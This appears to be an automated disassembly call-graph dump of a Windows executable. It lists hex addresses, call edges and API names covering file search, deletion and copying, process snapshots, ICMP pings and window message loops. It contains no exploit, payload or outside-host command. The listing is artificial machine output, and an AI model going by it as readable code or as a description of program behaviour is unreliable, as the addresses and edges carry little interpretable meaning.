98046 299f47 98044->98046 98057 29a05b InitializeCriticalSectionAndSpinCount 98045->98057 98058 292f85 98046->98058 98049 299f3b 98064 299f63 LeaveCriticalSection _doexit 98049->98064 98052->98034 98053->98039 98055->98035 98056->98033 98057->98049 98059 292fb7 __dosmaperr 98058->98059 98060 292f8e RtlFreeHeap 98058->98060 98059->98049 98060->98059 98061 292fa3 98060->98061 98065 298d58 58 API calls __getptd_noexit 98061->98065 98063 292fa9 GetLastError 98063->98059 98064->98033 98065->98063 98066->98012 98067->98011 98068->98016 98072 299fa5 LeaveCriticalSection 98069->98072 98071 292eb7 98071->98002 98072->98071 98073 2d92c8 98074 2d92db 98073->98074 98075 2d92d5 98073->98075 98077 292f85 _free 58 API calls 98074->98077 98079 2d92ec 98074->98079 98076 292f85 _free 58 API calls 98075->98076 98076->98074 98077->98079 98078 2d92fe 98079->98078 98080 292f85 _free 58 API calls 98079->98080 98080->98078 98081 276981 98088 27373a 98081->98088 98083 276997 98097 277b3f 98083->98097 98085 2769bf 98086 27584d 98085->98086 98109 2da48d 89 API calls 4 library calls 98085->98109 98089 273746 98088->98089 98090 273758 98088->98090 98110 27523c 98089->98110 98092 273787 98090->98092 98093 27375e 98090->98093 98095 27523c 59 API calls 98092->98095 98094 290fe6 Mailbox 59 API calls 98093->98094 98096 273750 98094->98096 98095->98096 98096->98083 98119 28162d 98097->98119 98099 277b64 _wcscmp 98103 277b98 Mailbox 98099->98103 98124 281a36 98099->98124 98103->98085 98106 2affc9 98107 27523c 59 API calls 98106->98107 98108 2affcd Mailbox 98106->98108 98107->98108 98108->98085 98109->98086 98111 27524a 98110->98111 98113 275250 98110->98113 98111->98113 98114 281c9c 98111->98114 98113->98096 98115 281caf 98114->98115 98116 281ca7 98114->98116 98115->98113 98118 281bcc 59 API calls 2 library calls 98116->98118 98118->98115 98120 290fe6 Mailbox 59 API calls 98119->98120 98121 281652 98120->98121 98122 290fe6 Mailbox 59 API calls 98121->98122 98123 281660 98122->98123 98123->98099 98125 
281a45 __NMSG_WRITE _memmove 98124->98125 98126 290fe6 Mailbox 59 API calls 98125->98126 98127 281a83 98126->98127 98128 2817e0 98127->98128 98129 2bf401 98128->98129 98130 2817f2 98128->98130 98144 2c87f9 59 API calls _memmove 98129->98144 98138 281680 98130->98138 98133 2817fe 98137 273938 68 API calls 98133->98137 98134 2bf40b 98135 281c9c 59 API calls 98134->98135 98136 2bf413 Mailbox 98135->98136 98137->98106 98139 281692 98138->98139 98143 2816ba _memmove 98138->98143 98140 290fe6 Mailbox 59 API calls 98139->98140 98139->98143 98142 28176f _memmove 98140->98142 98141 290fe6 Mailbox 59 API calls 98141->98142 98142->98141 98143->98133 98144->98134 98145 2ae463 98146 27373a 59 API calls 98145->98146 98147 2ae479 98146->98147 98148 2ae4fa 98147->98148 98149 2ae48f 98147->98149 98157 27b020 98148->98157 98199 275376 60 API calls 98149->98199 98153 2ae4ee Mailbox 98155 2af046 Mailbox 98153->98155 98201 2da48d 89 API calls 4 library calls 98153->98201 98154 2ae4ce 98154->98153 98200 2d890a 59 API calls Mailbox 98154->98200 98202 283740 98157->98202 98160 2b30b6 98310 2da48d 89 API calls 4 library calls 98160->98310 98161 27b07f 98161->98160 98163 2b30d4 98161->98163 98184 27bb86 98161->98184 98196 27b132 Mailbox _memmove 98161->98196 98311 2da48d 89 API calls 4 library calls 98163->98311 98165 2b355e 98198 27b4dd 98165->98198 98354 2da48d 89 API calls 4 library calls 98165->98354 98167 2c730a 59 API calls 98167->98196 98168 290fe6 59 API calls Mailbox 98168->98196 98169 2b318a 98169->98198 98313 2da48d 89 API calls 4 library calls 98169->98313 98173 2b3106 98173->98169 98312 27a9de 301 API calls 98173->98312 98176 273b31 59 API calls 98176->98196 98179 2753b0 301 API calls 98179->98196 98180 2b3418 98320 2753b0 98180->98320 98183 2b3448 98183->98198 98348 2739be 98183->98348 98309 2da48d 89 API calls 4 library calls 98184->98309 98187 2b31c3 98314 2da48d 89 API calls 4 library calls 98187->98314 98188 273c30 68 API calls 98188->98196 98191 2b346f 98352 2da48d 89 API 
calls 4 library calls 98191->98352 98194 281c9c 59 API calls 98194->98196 98195 27523c 59 API calls 98195->98196 98196->98165 98196->98167 98196->98168 98196->98173 98196->98176 98196->98179 98196->98180 98196->98184 98196->98187 98196->98188 98196->98191 98196->98194 98196->98195 98196->98198 98207 273add 98196->98207 98214 27bc70 98196->98214 98297 273a40 98196->98297 98308 275190 59 API calls Mailbox 98196->98308 98315 2c6c62 59 API calls 2 library calls 98196->98315 98316 2ea9c3 85 API calls Mailbox 98196->98316 98317 2c6c1e 59 API calls Mailbox 98196->98317 98318 2d5ef2 68 API calls 98196->98318 98319 273ea3 68 API calls Mailbox 98196->98319 98353 2da12a 59 API calls 98196->98353 98198->98153 98199->98154 98200->98153 98201->98155 98203 28374f 98202->98203 98206 28376a 98202->98206 98204 281aa4 59 API calls 98203->98204 98205 283757 CharUpperBuffW 98204->98205 98205->98206 98206->98161 98208 2ad3cd 98207->98208 98209 273aee 98207->98209 98210 290fe6 Mailbox 59 API calls 98209->98210 98211 273af5 98210->98211 98212 273b16 98211->98212 98355 273ba5 59 API calls Mailbox 98211->98355 98212->98196 98215 2b359f 98214->98215 98226 27bc95 98214->98226 98483 2da48d 89 API calls 4 library calls 98215->98483 98217 27bf3b 98217->98196 98221 27c2b6 98221->98217 98222 27c2c3 98221->98222 98481 27c483 301 API calls Mailbox 98222->98481 98225 27c2ca LockWindowUpdate DestroyWindow GetMessageW 98225->98217 98227 27c2fc 98225->98227 98289 27bca5 Mailbox 98226->98289 98484 275376 60 API calls 98226->98484 98485 2c700c 301 API calls 98226->98485 98228 2b4509 TranslateMessage DispatchMessageW GetMessageW 98227->98228 98228->98228 98230 2b4539 98228->98230 98229 2b36b3 Sleep 98229->98289 98230->98217 98231 2b405d WaitForSingleObject 98236 2b407d GetExitCodeProcess CloseHandle 98231->98236 98231->98289 98232 27bf54 timeGetTime 98232->98289 98233 290fe6 59 API calls Mailbox 98233->98289 98235 27c210 Sleep 98235->98289 98245 27c36b 98236->98245 98237 281c9c 59 API calls 98237->98289 
98238 281207 59 API calls 98271 2b3895 Mailbox 98238->98271 98239 2b43a9 Sleep 98239->98271 98243 27c324 timeGetTime 98482 275376 60 API calls 98243->98482 98245->98196 98248 2b4440 GetExitCodeProcess 98250 2b446c CloseHandle 98248->98250 98251 2b4456 WaitForSingleObject 98248->98251 98250->98271 98251->98250 98251->98289 98252 276cd8 279 API calls 98252->98289 98253 2f6562 110 API calls 98253->98271 98256 276d79 109 API calls 98256->98289 98257 2b38aa Sleep 98257->98289 98258 2b44c8 Sleep 98258->98289 98261 281a36 59 API calls 98261->98271 98262 275376 60 API calls 98262->98289 98267 27c26d 98270 281a36 59 API calls 98267->98270 98268 27b020 279 API calls 98268->98289 98274 27bf25 Mailbox 98270->98274 98271->98238 98271->98245 98271->98248 98271->98253 98271->98257 98271->98258 98271->98261 98271->98289 98509 2d2baf 60 API calls 98271->98509 98510 275376 60 API calls 98271->98510 98511 273ea3 68 API calls Mailbox 98271->98511 98512 276cd8 301 API calls 98271->98512 98553 2c70e2 59 API calls 98271->98553 98554 2d57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98271->98554 98555 29083e timeGetTime 98271->98555 98556 2d4148 CreateToolhelp32Snapshot Process32FirstW 98271->98556 98272 281a36 59 API calls 98272->98289 98274->98217 98480 27c460 10 API calls Mailbox 98274->98480 98277 275190 59 API calls Mailbox 98277->98289 98278 2753b0 279 API calls 98278->98289 98279 273a40 59 API calls 98279->98289 98280 2739be 68 API calls 98280->98289 98281 2da48d 89 API calls 98281->98289 98282 2b3e13 VariantClear 98282->98289 98283 2c7aad 59 API calls 98283->98289 98284 2c6cf1 59 API calls Mailbox 98284->98289 98285 2b3ea9 VariantClear 98285->98289 98286 2741c4 59 API calls Mailbox 98286->98289 98287 2b3c57 VariantClear 98287->98289 98288 273ea3 68 API calls 98288->98289 98289->98229 98289->98231 98289->98232 98289->98233 98289->98235 98289->98237 98289->98239 98289->98243 98289->98245 98289->98252 98289->98256 98289->98262 98289->98267 
98289->98268 98289->98271 98289->98272 98289->98274 98289->98277 98289->98278 98289->98279 98289->98280 98289->98281 98289->98282 98289->98283 98289->98284 98289->98285 98289->98286 98289->98287 98289->98288 98356 2752b0 98289->98356 98365 279a00 98289->98365 98372 279c80 98289->98372 98403 27a820 98289->98403 98420 27e36d 98289->98420 98429 2842cf 98289->98429 98433 2dc270 98289->98433 98440 2dbcd6 98289->98440 98470 2de4a0 98289->98470 98473 2d412a 98289->98473 98476 2ee60c 98289->98476 98479 29083e timeGetTime 98289->98479 98486 2f6655 59 API calls 98289->98486 98487 2da058 59 API calls Mailbox 98289->98487 98488 2ce0aa 59 API calls 98289->98488 98489 274d37 98289->98489 98507 2c6c62 59 API calls 2 library calls 98289->98507 98508 2738ff 59 API calls 98289->98508 98513 2ec355 98289->98513 98298 273a53 98297->98298 98299 2ad3b1 98297->98299 98301 273a9a Mailbox 98298->98301 98303 273a7d 98298->98303 99207 273b31 98298->99207 98300 2ad3c1 98299->98300 99216 2c6d17 59 API calls 98299->99216 98301->98196 98305 273a83 98303->98305 98306 273b31 59 API calls 98303->98306 98305->98301 99215 275190 59 API calls Mailbox 98305->99215 98306->98305 98308->98196 98309->98160 98310->98198 98311->98198 98312->98169 98313->98198 98314->98198 98315->98196 98316->98196 98317->98196 98318->98196 98319->98196 98321 2753cf 98320->98321 98343 2753fd Mailbox 98320->98343 98322 290fe6 Mailbox 59 API calls 98321->98322 98322->98343 98323 2769fa 98324 281c9c 59 API calls 98323->98324 98344 275569 Mailbox 98324->98344 98325 2769ff 98326 2ae691 98325->98326 98327 2af165 98325->98327 99236 2da48d 89 API calls 4 library calls 98326->99236 99240 2da48d 89 API calls 4 library calls 98327->99240 98331 290fe6 59 API calls Mailbox 98331->98343 98332 2ae6a0 98332->98183 98333 281c9c 59 API calls 98333->98343 98335 2aea9a 98338 281c9c 59 API calls 98335->98338 98336 281207 59 API calls 98336->98343 98338->98344 98339 2aeb67 98339->98344 99237 2c7aad 59 API calls 98339->99237 98340 292f70 67 API 
calls __cinit 98340->98343 98342 2c7aad 59 API calls 98342->98343 98343->98323 98343->98325 98343->98326 98343->98331 98343->98333 98343->98335 98343->98336 98343->98339 98343->98340 98343->98342 98343->98344 98345 2aef28 98343->98345 98347 275a1a 98343->98347 99218 276e30 98343->99218 99235 277e50 301 API calls 2 library calls 98343->99235 98344->98183 99238 2da48d 89 API calls 4 library calls 98345->99238 99239 2da48d 89 API calls 4 library calls 98347->99239 98349 2739c9 98348->98349 98351 2739f0 98349->98351 99246 273ea3 68 API calls Mailbox 98349->99246 98351->98191 98352->98198 98353->98196 98354->98198 98355->98212 98357 2752c6 98356->98357 98359 275313 98356->98359 98358 2752d3 PeekMessageW 98357->98358 98357->98359 98358->98359 98360 2752ec 98358->98360 98359->98360 98362 2adf68 TranslateAcceleratorW 98359->98362 98363 275352 TranslateMessage DispatchMessageW 98359->98363 98364 27533e PeekMessageW 98359->98364 98566 27359e 98359->98566 98360->98289 98362->98359 98362->98364 98363->98364 98364->98359 98364->98360 98366 279a31 98365->98366 98367 279a1d 98365->98367 98605 2da48d 89 API calls 4 library calls 98366->98605 98571 2794e0 98367->98571 98369 279a28 98369->98289 98371 2b2478 98371->98371 98373 279cb5 98372->98373 98374 2b247d 98373->98374 98376 279d1f 98373->98376 98386 279d79 98373->98386 98375 2753b0 301 API calls 98374->98375 98377 2b2492 98375->98377 98379 281207 59 API calls 98376->98379 98376->98386 98401 279f50 Mailbox 98377->98401 98615 2da48d 89 API calls 4 library calls 98377->98615 98378 281207 59 API calls 98378->98386 98381 2b24d8 98379->98381 98383 292f70 __cinit 67 API calls 98381->98383 98382 292f70 __cinit 67 API calls 98382->98386 98383->98386 98384 2b24fa 98384->98289 98385 2739be 68 API calls 98385->98401 98386->98378 98386->98382 98386->98384 98389 279f3a 98386->98389 98386->98401 98388 2753b0 301 API calls 98388->98401 98389->98401 98616 2da48d 89 API calls 4 library calls 98389->98616 98390 27a775 98620 2da48d 89 API calls 4 
library calls 98390->98620 98394 2b27f9 98394->98289 98395 274230 59 API calls 98395->98401 98397 2da48d 89 API calls 98397->98401 98401->98385 98401->98388 98401->98390 98401->98395 98401->98397 98402 27a058 98401->98402 98614 281bcc 59 API calls 2 library calls 98401->98614 98617 2c7aad 59 API calls 98401->98617 98618 2eccac 301 API calls 98401->98618 98619 2ebc26 301 API calls Mailbox 98401->98619 98621 275190 59 API calls Mailbox 98401->98621 98622 2e9ab0 301 API calls Mailbox 98401->98622 98402->98289 98404 2b2d51 98403->98404 98407 27a84c 98403->98407 98624 2da48d 89 API calls 4 library calls 98404->98624 98406 2b2d62 98406->98289 98408 2b2d6a 98407->98408 98416 27a888 _memmove 98407->98416 98625 2da48d 89 API calls 4 library calls 98408->98625 98410 27a962 98418 27a975 98410->98418 98623 2ea9c3 85 API calls Mailbox 98410->98623 98411 290fe6 59 API calls Mailbox 98411->98416 98413 2b2dae 98626 27a9de 301 API calls 98413->98626 98414 2753b0 301 API calls 98414->98416 98416->98410 98416->98411 98416->98413 98416->98414 98417 2b2dc8 98416->98417 98416->98418 98417->98418 98627 2da48d 89 API calls 4 library calls 98417->98627 98418->98289 98628 27502b 98420->98628 98422 27e381 98423 27e385 timeGetTime 98422->98423 98424 27e3bc Sleep 98422->98424 98425 27502b 59 API calls 98423->98425 98426 27e3b4 98424->98426 98427 27e39b 98425->98427 98426->98289 98428 27bc70 299 API calls 98427->98428 98428->98426 98430 2842e8 98429->98430 98431 2842d9 98429->98431 98430->98431 98432 2842ed CloseHandle 98430->98432 98431->98289 98432->98431 98434 274d37 84 API calls 98433->98434 98435 2dc286 98434->98435 98633 2d4005 98435->98633 98437 2dc28e 98438 2dc292 GetLastError 98437->98438 98439 2dc2a7 98437->98439 98438->98439 98439->98289 98441 2dbcf5 98440->98441 98467 2dbdbb Mailbox 98440->98467 98442 27502b 59 API calls 98441->98442 98444 2dbd00 98442->98444 98443 274d37 84 API calls 98445 2dbdf3 98443->98445 98447 27502b 59 API calls 98444->98447 98446 274d37 84 API calls 
98445->98446 98448 2dbe05 98446->98448 98449 2dbd14 98447->98449 98772 2d3ce2 98448->98772 98451 281207 59 API calls 98449->98451 98449->98467 98452 2dbd25 98451->98452 98453 281207 59 API calls 98452->98453 98454 2dbd2e 98453->98454 98455 274d37 84 API calls 98454->98455 98456 2dbd3b 98455->98456 98457 290119 59 API calls 98456->98457 98458 2dbd4e 98457->98458 98459 2817e0 59 API calls 98458->98459 98460 2dbd5f 98459->98460 98461 2d412a 3 API calls 98460->98461 98469 2dbd88 Mailbox 98460->98469 98463 2dbd6e 98461->98463 98462 27502b 59 API calls 98462->98467 98464 281a36 59 API calls 98463->98464 98463->98469 98465 2dbd7f 98464->98465 98760 2d3f1d 98465->98760 98467->98443 98468 2dbdc3 Mailbox 98467->98468 98468->98289 98469->98462 98895 2df87d 98470->98895 98472 2de4b0 98472->98289 99026 2d494a GetFileAttributesW 98473->99026 99030 2ed1c6 98476->99030 98478 2ee61c 98478->98289 98479->98289 98480->98221 98481->98225 98482->98289 98483->98226 98484->98226 98485->98226 98486->98289 98487->98289 98488->98289 98490 274d51 98489->98490 98491 274d4b 98489->98491 98492 2adb28 __i64tow 98490->98492 98493 274d99 98490->98493 98495 274d57 __itow 98490->98495 98498 2ada2f 98490->98498 98491->98289 99139 2938c8 83 API calls 3 library calls 98493->99139 98497 290fe6 Mailbox 59 API calls 98495->98497 98499 274d71 98497->98499 98500 290fe6 Mailbox 59 API calls 98498->98500 98505 2adaa7 Mailbox _wcscpy 98498->98505 98499->98491 98501 281a36 59 API calls 98499->98501 98502 2ada74 98500->98502 98501->98491 98503 290fe6 Mailbox 59 API calls 98502->98503 98504 2ada9a 98503->98504 98504->98505 98506 281a36 59 API calls 98504->98506 99140 2938c8 83 API calls 3 library calls 98505->99140 98506->98505 98507->98289 98508->98289 98509->98271 98510->98271 98511->98271 98512->98271 98514 2ec39a 98513->98514 98515 2ec380 98513->98515 99141 2ea8fd 98514->99141 99168 2da48d 89 API calls 4 library calls 98515->99168 98519 2753b0 300 API calls 98520 2ec406 98519->98520 98521 2ec392 Mailbox 
98520->98521 98522 2ec498 98520->98522 98525 2ec447 98520->98525 98521->98289 98523 2ec4ee 98522->98523 98524 2ec49e 98522->98524 98523->98521 98526 274d37 84 API calls 98523->98526 99169 2d7ed5 59 API calls 98524->99169 98530 2d789a 59 API calls 98525->98530 98528 2ec500 98526->98528 98531 281aa4 59 API calls 98528->98531 98529 2ec4c1 99170 2835b9 59 API calls Mailbox 98529->99170 98533 2ec477 98530->98533 98534 2ec524 CharUpperBuffW 98531->98534 98536 2c6ebc 300 API calls 98533->98536 98537 2ec53e 98534->98537 98535 2ec4c9 Mailbox 98540 27b020 300 API calls 98535->98540 98536->98521 98538 2ec545 98537->98538 98539 2ec591 98537->98539 99148 2d789a 98538->99148 98541 274d37 84 API calls 98539->98541 98540->98521 98542 2ec599 98541->98542 99171 275376 60 API calls 98542->99171 98547 2ec5a3 98547->98521 98548 274d37 84 API calls 98547->98548 98549 2ec5be 98548->98549 99172 2835b9 59 API calls Mailbox 98549->99172 98551 2ec5ce 98552 27b020 300 API calls 98551->98552 98552->98521 98553->98271 98554->98271 98555->98271 99199 2d4ce2 98556->99199 98558 2d4195 Process32NextW 98559 2d4244 CloseHandle 98558->98559 98565 2d418e Mailbox 98558->98565 98559->98271 98560 281207 59 API calls 98560->98565 98561 281a36 59 API calls 98561->98565 98562 290119 59 API calls 98562->98565 98563 2817e0 59 API calls 98563->98565 98564 28151f 61 API calls 98564->98565 98565->98558 98565->98559 98565->98560 98565->98561 98565->98562 98565->98563 98565->98564 98567 2735e2 98566->98567 98569 2735b0 98566->98569 98567->98359 98568 2735d5 IsDialogMessageW 98568->98567 98568->98569 98569->98567 98569->98568 98570 2ad273 GetClassLongW 98569->98570 98570->98568 98570->98569 98572 2753b0 301 API calls 98571->98572 98573 27951f 98572->98573 98574 2b2001 98573->98574 98588 279527 _memmove 98573->98588 98607 275190 59 API calls Mailbox 98574->98607 98576 2b22c0 98613 2da48d 89 API calls 4 library calls 98576->98613 98578 2b22de 98578->98578 98579 279583 98579->98369 98580 279944 98583 290fe6 Mailbox 59 
API calls 98580->98583 98581 27986a 98584 27987f 98581->98584 98585 2b22b1 98581->98585 98582 290fe6 59 API calls Mailbox 98582->98588 98597 2796e3 _memmove 98583->98597 98587 290fe6 Mailbox 59 API calls 98584->98587 98612 2ea983 59 API calls 98585->98612 98592 27977d 98587->98592 98588->98576 98588->98579 98588->98580 98588->98582 98589 2796cf 98588->98589 98600 279741 98588->98600 98589->98580 98591 2796dc 98589->98591 98590 290fe6 Mailbox 59 API calls 98595 27970e 98590->98595 98594 290fe6 Mailbox 59 API calls 98591->98594 98592->98369 98593 2b22a0 98611 2da48d 89 API calls 4 library calls 98593->98611 98594->98597 98595->98600 98606 27cca0 301 API calls 98595->98606 98597->98590 98597->98595 98597->98600 98600->98581 98600->98592 98600->98593 98601 2b2278 98600->98601 98603 2b2253 98600->98603 98608 278180 301 API calls 98600->98608 98610 2da48d 89 API calls 4 library calls 98601->98610 98609 2da48d 89 API calls 4 library calls 98603->98609 98605->98371 98606->98600 98607->98580 98608->98600 98609->98592 98610->98592 98611->98592 98612->98576 98613->98578 98614->98401 98615->98401 98616->98401 98617->98401 98618->98401 98619->98401 98620->98394 98621->98401 98622->98401 98623->98418 98624->98406 98625->98418 98626->98417 98627->98418 98629 275041 98628->98629 98630 27503c 98628->98630 98629->98422 98630->98629 98632 2937ba 59 API calls 98630->98632 98632->98629 98634 281207 59 API calls 98633->98634 98635 2d4024 98634->98635 98636 281207 59 API calls 98635->98636 98637 2d402d 98636->98637 98638 281207 59 API calls 98637->98638 98639 2d4036 98638->98639 98657 290284 98639->98657 98644 2d405c 98669 290119 98644->98669 98645 281900 59 API calls 98645->98644 98647 2d4070 FindFirstFileW 98648 2d40fc FindClose 98647->98648 98651 2d408f 98647->98651 98654 2d4107 Mailbox 98648->98654 98649 2d40d7 FindNextFileW 98649->98651 98650 281c9c 59 API calls 98650->98651 98651->98648 98651->98649 98651->98650 98652 2817e0 59 API calls 98651->98652 98720 281900 98651->98720 
98652->98651 98654->98437 98656 2d40f3 FindClose 98656->98654 98727 2a1b70 98657->98727 98660 2902cd 98733 2819e1 98660->98733 98661 2902b0 98662 281821 59 API calls 98661->98662 98664 2902bc 98662->98664 98729 28133d 98664->98729 98667 2d4fec GetFileAttributesW 98668 2d404a 98667->98668 98668->98644 98668->98645 98670 281207 59 API calls 98669->98670 98671 29012f 98670->98671 98672 281207 59 API calls 98671->98672 98673 290137 98672->98673 98674 281207 59 API calls 98673->98674 98675 29013f 98674->98675 98676 281207 59 API calls 98675->98676 98677 290147 98676->98677 98678 2c627d 98677->98678 98679 29017b 98677->98679 98680 281c9c 59 API calls 98678->98680 98681 281462 59 API calls 98679->98681 98682 2c6286 98680->98682 98683 290189 98681->98683 98684 2819e1 59 API calls 98682->98684 98685 281981 59 API calls 98683->98685 98688 2901be 98684->98688 98686 290193 98685->98686 98686->98688 98689 281462 59 API calls 98686->98689 98687 2901fe 98737 281462 98687->98737 98688->98687 98691 2901dd 98688->98691 98700 2c62a6 98688->98700 98692 2901b4 98689->98692 98750 281609 98691->98750 98696 281981 59 API calls 98692->98696 98694 29020f 98699 290221 98694->98699 98701 281c9c 59 API calls 98694->98701 98695 2c6376 98697 281821 59 API calls 98695->98697 98696->98688 98715 2c6333 98697->98715 98702 290231 98699->98702 98703 281c9c 59 API calls 98699->98703 98700->98695 98704 2c635f 98700->98704 98713 2c62dd 98700->98713 98701->98699 98705 290238 98702->98705 98707 281c9c 59 API calls 98702->98707 98703->98702 98704->98695 98710 2c634a 98704->98710 98708 281c9c 59 API calls 98705->98708 98717 29023f Mailbox 98705->98717 98706 281462 59 API calls 98706->98687 98707->98705 98708->98717 98709 2c633b 98711 281821 59 API calls 98709->98711 98712 281821 59 API calls 98710->98712 98711->98715 98712->98715 98713->98709 98718 2c6326 98713->98718 98714 281609 59 API calls 98714->98715 98715->98687 98715->98714 98753 28153b 59 API calls 2 library calls 98715->98753 98717->98647 98719 
281821 59 API calls 98718->98719 98719->98715 98721 281914 98720->98721 98722 2bf534 98720->98722 98755 2818a5 98721->98755 98724 281c7e 59 API calls 98722->98724 98726 2bf53f __NMSG_WRITE _memmove 98724->98726 98725 28191f DeleteFileW 98725->98649 98725->98656 98728 290291 GetFullPathNameW 98727->98728 98728->98660 98728->98661 98730 28134b 98729->98730 98731 281981 59 API calls 98730->98731 98732 28135b 98731->98732 98732->98667 98734 2819fb 98733->98734 98736 2819ee 98733->98736 98735 290fe6 Mailbox 59 API calls 98734->98735 98735->98736 98736->98664 98738 2814ce 98737->98738 98739 281471 98737->98739 98740 281981 59 API calls 98738->98740 98739->98738 98741 28147c 98739->98741 98747 28149f _memmove 98740->98747 98742 2bf1de 98741->98742 98743 281497 98741->98743 98744 281c7e 59 API calls 98742->98744 98754 281b7c 59 API calls Mailbox 98743->98754 98746 2bf1e8 98744->98746 98748 290fe6 Mailbox 59 API calls 98746->98748 98747->98694 98749 2bf208 98748->98749 98751 281aa4 59 API calls 98750->98751 98752 281614 98751->98752 98752->98687 98752->98706 98753->98715 98754->98747 98756 2818b4 __NMSG_WRITE 98755->98756 98757 281c7e 59 API calls 98756->98757 98758 2818c5 _memmove 98756->98758 98759 2bf4f1 _memmove 98757->98759 98758->98725 98761 28133d 59 API calls 98760->98761 98762 2d3f52 GetFileAttributesW 98761->98762 98763 2d3f66 GetLastError 98762->98763 98770 2d3f7f Mailbox 98762->98770 98764 2d3f73 CreateDirectoryW 98763->98764 98765 2d3f81 98763->98765 98764->98765 98764->98770 98766 281981 59 API calls 98765->98766 98765->98770 98767 2d3fc3 98766->98767 98768 2d3f1d 59 API calls 98767->98768 98769 2d3fcc 98768->98769 98769->98770 98771 2d3fd0 CreateDirectoryW 98769->98771 98770->98469 98771->98770 98773 281207 59 API calls 98772->98773 98774 2d3cff 98773->98774 98775 281207 59 API calls 98774->98775 98776 2d3d07 98775->98776 98777 281207 59 API calls 98776->98777 98778 2d3d0f 98777->98778 98779 281207 59 API calls 98778->98779 98780 2d3d17 98779->98780 98781 
290284 60 API calls 98780->98781 98782 2d3d21 98781->98782 98783 290284 60 API calls 98782->98783 98784 2d3d2b 98783->98784 98818 2d4f82 98784->98818 98786 2d3d36 98787 2d4fec GetFileAttributesW 98786->98787 98788 2d3d41 98787->98788 98789 2d3d53 98788->98789 98790 281900 59 API calls 98788->98790 98791 2d4fec GetFileAttributesW 98789->98791 98790->98789 98792 2d3d5b 98791->98792 98793 2d3d68 98792->98793 98794 281900 59 API calls 98792->98794 98795 281207 59 API calls 98793->98795 98794->98793 98796 2d3d70 98795->98796 98797 281207 59 API calls 98796->98797 98798 2d3d78 98797->98798 98799 290119 59 API calls 98798->98799 98800 2d3d89 FindFirstFileW 98799->98800 98801 2d3eb4 FindClose 98800->98801 98816 2d3dac Mailbox 98800->98816 98806 2d3ebe Mailbox 98801->98806 98802 2d3e88 FindNextFileW 98802->98816 98803 281a36 59 API calls 98803->98816 98805 281c9c 59 API calls 98805->98816 98806->98468 98807 2817e0 59 API calls 98807->98816 98808 281900 59 API calls 98808->98816 98809 2d412a 3 API calls 98809->98816 98810 2d3eab FindClose 98810->98806 98811 2d3e2a 98814 2d3e4e MoveFileW 98811->98814 98815 2d3e3e DeleteFileW 98811->98815 98883 28151f 98811->98883 98812 2d3ef7 CopyFileExW 98812->98816 98814->98816 98815->98816 98816->98801 98816->98802 98816->98803 98816->98805 98816->98807 98816->98808 98816->98809 98816->98810 98816->98811 98816->98812 98817 2d3e6b DeleteFileW 98816->98817 98829 2d4561 98816->98829 98817->98816 98819 281207 59 API calls 98818->98819 98820 2d4f97 98819->98820 98821 281207 59 API calls 98820->98821 98822 2d4f9f 98821->98822 98823 290119 59 API calls 98822->98823 98824 2d4fae 98823->98824 98825 290119 59 API calls 98824->98825 98826 2d4fbe 98825->98826 98827 28151f 61 API calls 98826->98827 98828 2d4fce Mailbox 98827->98828 98828->98786 98830 2d457d 98829->98830 98831 2d4590 98830->98831 98832 2d4582 98830->98832 98834 281207 59 API calls 98831->98834 98833 281c9c 59 API calls 98832->98833 98835 2d458b Mailbox 98833->98835 98836 2d4598 
27d6d7 100867->100870 100872 27502b 59 API calls 100868->100872 100977 2841d6 100869->100977 100870->100859 100870->100860 100995 283f0b CloseHandle 100870->100995 100874 27d6f3 100872->100874 100875 2b50ca 100874->100875 100876 27d70d 100874->100876 100878 290fe6 Mailbox 59 API calls 100875->100878 100877 281207 59 API calls 100876->100877 100879 27d715 100877->100879 100880 2b50d0 100878->100880 100992 283b7b 65 API calls Mailbox 100879->100992 100882 2b50e4 100880->100882 100883 283ea1 2 API calls 100880->100883 100886 2b50e8 _memmove 100882->100886 100982 2d7c7f 100882->100982 100883->100882 100885 27d724 100885->100886 100993 274f3c 59 API calls Mailbox 100885->100993 100888 27d738 Mailbox 100889 27d772 100888->100889 100890 2842cf CloseHandle 100888->100890 100889->100777 100891 27d766 100890->100891 100891->100889 100994 283f0b CloseHandle 100891->100994 100894 274d37 84 API calls 100893->100894 100895 27d001 100894->100895 100896 275278 59 API calls 100895->100896 100897 27d018 100896->100897 100898 27502b 59 API calls 100897->100898 100899 27d57b 100897->100899 100906 27d439 Mailbox __NMSG_WRITE 100897->100906 100898->100906 100899->100777 100900 29312d _W_store_winword 60 API calls 100900->100906 100901 290c65 62 API calls 100901->100906 100902 28162d 59 API calls 100902->100906 100903 274f98 59 API calls 100903->100906 100906->100899 100906->100900 100906->100901 100906->100902 100906->100903 100907 274d37 84 API calls 100906->100907 100908 27502b 59 API calls 100906->100908 100909 281821 59 API calls 100906->100909 100910 2859d3 94 API calls 100906->100910 100911 285ac3 Shell_NotifyIconW 100906->100911 100997 28153b 59 API calls 2 library calls 100906->100997 100998 274f3c 59 API calls Mailbox 100906->100998 100907->100906 100908->100906 100909->100906 100910->100906 100911->100906 100913 2e5e46 100912->100913 100914 2e5e74 WSAStartup 100913->100914 100916 27502b 59 API calls 100913->100916 100915 2e5e9d 100914->100915 100926 2e5e88 Mailbox 
100914->100926 100917 2840cd 59 API calls 100915->100917 100918 2e5e61 100916->100918 100919 2e5ea6 100917->100919 100918->100914 100921 27502b 59 API calls 100918->100921 100920 274d37 84 API calls 100919->100920 100923 2e5eb2 100920->100923 100922 2e5e70 100921->100922 100922->100914 100924 28402a 61 API calls 100923->100924 100925 2e5ebf inet_addr gethostbyname 100924->100925 100925->100926 100927 2e5edd IcmpCreateFile 100925->100927 100926->100777 100927->100926 100928 2e5f01 100927->100928 100929 290fe6 Mailbox 59 API calls 100928->100929 100930 2e5f1a 100929->100930 100931 28433f 59 API calls 100930->100931 100932 2e5f25 100931->100932 100933 2e5f34 IcmpSendEcho 100932->100933 100934 2e5f55 IcmpSendEcho 100932->100934 100935 2e5f6d 100933->100935 100934->100935 100936 2e5fd4 IcmpCloseHandle WSACleanup 100935->100936 100936->100926 100938 2eebcd 100937->100938 100939 274d37 84 API calls 100938->100939 100942 2eebdc 100938->100942 100940 2eec0a 100939->100940 100999 2d7ce4 100940->100999 100942->100777 100943->100790 100944->100777 100945->100762 100946->100751 100947->100764 100948->100767 100949->100757 100950->100757 100951->100777 100952->100776 100953->100791 100954->100795 100955->100745 100956->100791 100957->100745 100958->100745 100959->100791 100960->100791 100961->100813 100962->100846 100963->100846 100966 2add2b 100964->100966 100968 274fa8 100964->100968 100965 2add3c 100967 2819e1 59 API calls 100965->100967 